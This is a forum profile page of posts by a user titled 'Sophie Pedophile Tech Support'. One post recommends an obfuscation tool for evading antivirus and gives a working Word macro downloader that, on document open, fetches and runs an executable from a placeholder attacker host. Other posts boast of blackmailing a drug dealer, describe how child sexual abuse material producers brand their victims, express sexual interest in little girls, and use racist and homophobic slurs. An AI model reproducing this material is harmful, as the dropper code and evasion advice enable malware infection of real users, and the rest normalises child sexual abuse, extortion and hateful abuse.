User Controls

  1. 1
  2. 2
  3. 3
  4. ...
  5. 1213
  6. 1214
  7. 1215
  8. 1216
  9. 1217
  10. 1218
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429

Posts by Sophie

  1. Sophie Pedophile Tech Support
    Dip them in chocolate.

    Add icing as well and you'll have Ichigo Daifuku.
  2. Sophie Pedophile Tech Support
    I didn't go to prison, I was in the county jail, because I didn't have enough cash on hand to bail myself out.

    We don't have different words for prison and jail in Dutch. They can keep you for three weeks at the police station then you get transferred to what's called Het Huis van Bewaring, which literally translates to The House of Detention where you're meant to stay pre-trial, once you get convicted you just go to prison. The Netherlands isn't a federation so we don't have differences between federal, state and county jail/prison.
  3. Sophie Pedophile Tech Support
    Figger naggots.

    When will be the welcome back from prison party Mike?
  4. Sophie Pedophile Tech Support
    tl;dr
  5. Sophie Pedophile Tech Support
    Doing good. Got ripped off yesterday, fresh out of jail, trying to buy some heroin, but when he got a phone call I saw the number and memorized it, it was his grandma, and using that number I tracked down who he was and now I am blackmailing the living fuck out of him.

    You know, the usual.

    Good memory bruh.
  6. Sophie Pedophile Tech Support
    Make strawberry cake, and strawberry jelly and maybe also strawberry smoothies or juice or something.
  7. Sophie Pedophile Tech Support
    A common vector for the delivery of malware is via Word/Excel macro. Obfuscating/encrypting the source code of your malware itself is obviously very important. Not only for opsec purposes but the longer it takes researchers/AV companies to reverse engineer your malware the longer it will stay effective. If your delivery mechanism is through a downloader embedded in an Office document adding obfuscation and encryption not only protects against reverse engineering but aids in evading AV heuristics as well. To that end i've found a python implementation that not only obfuscates your VBA code but automatically generates an Office document based on a template and inserts your downloader within it. What's more, it's fully customizable. It's features are as follows;
    • Encrypt all strings present in your VBA code
    • Encrypt data from your python Script in VBA code (domain names or paths for example)
    • Randomize each functions' (or variables) names
    • Choose Encryption method, how and where encryption keys are stored
    • Generate as many unique MS Office documents as you want using a file name list and a document template
    • Enable autodestruction of encryption Keys feature once the VBA has been triggered once

    As i understand it, the way it works is as follows. The python script reads in a VB script and looks for certain tags within the code. Based on the tags it performs an operation like randomizing a variable or function name, for instance:


    Function [rdm::10]Test() '=> Test() will become randomized with a 10 characters string
    [rdm::4]String_1 = "Test" '=> String_1 wil lbecome randomized with a 4 characters string


    Depending on the values you set in config.py a type of encryption is selected among a number of other settings. Here's a screenshot of the script in action.




    Pretty cool if you ask me, here's a link to the relevant repo on github. https://github.com/Pepitoh/VBad

    Now doing some research into malware deployed in this manner and relevant code examples written in VB Script i kind of tried to nigger rig the following based on code found here.

    https://github.com/CloudStrief/xcode...doc/skript.txt


    Option Explicit

    Public CN As String
    Public APD As String
    Public UN As String
    Public HOSTNAME As String
    Public DROPPER_EXE As String
    Public PAYLOADS_FOLDER As String
    Public PAYLOAD_FILE As String

    Function InitMe()
    DROPPER_EXE = "malware.exe"
    HOSTNAME = "http://www.evilhost.com/code"
    PAYLOADS_FOLDER = HOSTNAME & "/payloads/"
    CN = Environ("COMPUTERNAME")
    APD = Environ("TMP")
    UN = Environ("USERNAME")
    End Function


    Sub Document_Open()
    InitMe
    Dim val As String
    Dim FN As String

    PayLoad (APD + DROPPER_EXE)
    Dim oShell
    Set oShell = CreateObject("WScript.Shell")

    oShell.Run APD + DROPPER_EXE
    FN = APD

    On Error GoTo 0
    End Sub

    Private Sub writeBytes(file, bytes)
    Dim binaryStream
    Set binaryStream = CreateObject("ADODB.Stream")
    binaryStream.Type = 1
    binaryStream.Open
    binaryStream.Write bytes
    binaryStream.SaveToFile file, 2
    End Sub

    Function getPayload(val As String, FN As String)
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

    WinHttpReq.Open "GET", PAYLOADS_FOLDER & DROPPER_EXE

    WinHttpReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    WinHttpReq.SetRequestHeader "Accept", "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Language", "en-us,en;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7"

    WinHttpReq.send
    writeBytes FN, WinHttpReq.ResponseBody
    End Function



    This is probably full of errors since i don't have a clue about Visual Basic/VBA/VBS so i was wondering if you could help me improve this particular block of code. Interestingly enough the original repo contains all you need including malware itself written in python and everything you need server side to deploy this. If you're interested here's a link to the complete project.

    https://github.com/CloudStrief/xcode
  8. Sophie Pedophile Tech Support
    Yup, my shit was buggy, sorry for ever doubting you broski.

    That's alright. (n_n")
  9. Sophie Pedophile Tech Support
    Wait so CP girls go by monikers too, like porn stars? lol

    There are a number of semi-professional outfits that use monikers for their models and even pay the girls as far as i am aware. Individual content creators also use pseudonyms for the girls so that they're harder to track down while putting a brand on the content they create.
  10. Sophie Pedophile Tech Support
    Blowing out a candle for each year that's been spent up to that point is some deep existential shit if you think about it.
  11. Sophie Pedophile Tech Support
    Sophie told me to tell you thanks.

    Thanks Haley that'll be all.
  12. Sophie Pedophile Tech Support
    Psycho motherfucking mantits Mod Resume





    Objective: My objective is to make kek look bad
    Previous Job Experience:
    -Imperial Wizard on Zoklet. NAILED IT.
    -Grand Imperial Wizard on LLZ. NAILED IT until i got tired of the fat tranny in charge and told my personal army of 1337 h4x0rz to rek that shit.
    Special Skills:
    -Coding
    -Haxxing
    -Sorcery
    -Wizardry
    -CP expert
    Qualifications:
    1. Don't you wish your your girlfriend was cool like me?
    2. I got this | | close to banning Lan Lan for blasting 30k infractions on spectrals account with a script, now if that ain't fair idk what is.
    3. Saiko IV AkA Sophie has been upgraded with scripting functionality(Will do 30k+ infractions on request)
    4. As mod you were objectively more annoying than me in a mawd capacity
    My 3 biggest strenghts:
    1. I have no life
    2. Therefore i can spend an exorbitant amount of time online.
    My 3 biggest weaknesses:
    1. Little girls
    2. Lolis
    3. Nekkid lolis
    4. Scantly clad little girls in sexually suggestive positions

    I can be reached at:
    [EMAIL="The_Lord@Heaven.gov"]The_Lord@Heaven.gov[/EMAIL]
    or
    Dial 1488-JESUS-SAVES and ask for Haley(My personal assistant).
  13. Sophie Pedophile Tech Support
    I volunteer for mod.

    Disqualified.
  14. Sophie Pedophile Tech Support
    Inside here, dead we all are. You are among friend fam.
  15. Sophie Pedophile Tech Support
    is this some kind of autistic airsoft roleplay?

    I'd file it under urban exploring.
  16. Sophie Pedophile Tech Support
    Fuck you, sploo.

    Your sister is fat, i am dissapoint.
  17. Sophie Pedophile Tech Support
    I'm like 80% sure you don't even know what half of those words mean

    I'm like 90% sure it's more than half.
  18. Sophie Pedophile Tech Support
    Cool, too bad Infrared isn't here, he loves that shit.
  19. Sophie Pedophile Tech Support
    Kek, bonus points for Dasha. I prefer it when she looks happy without smiling though. Smiling makes her face look peculiar.
  20. Sophie Pedophile Tech Support
    I spent my last welfare cheque to hire a darknet hacker to spam this place. sc!!!! For shame ronaldo scron for shame.

    I would have done it for free and add dank Dasha Anya for good measure, for shame indeed.
  1. 1
  2. 2
  3. 3
  4. ...
  5. 1213
  6. 1214
  7. 1215
  8. 1216
  9. 1217
  10. 1218
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429
Jump to Top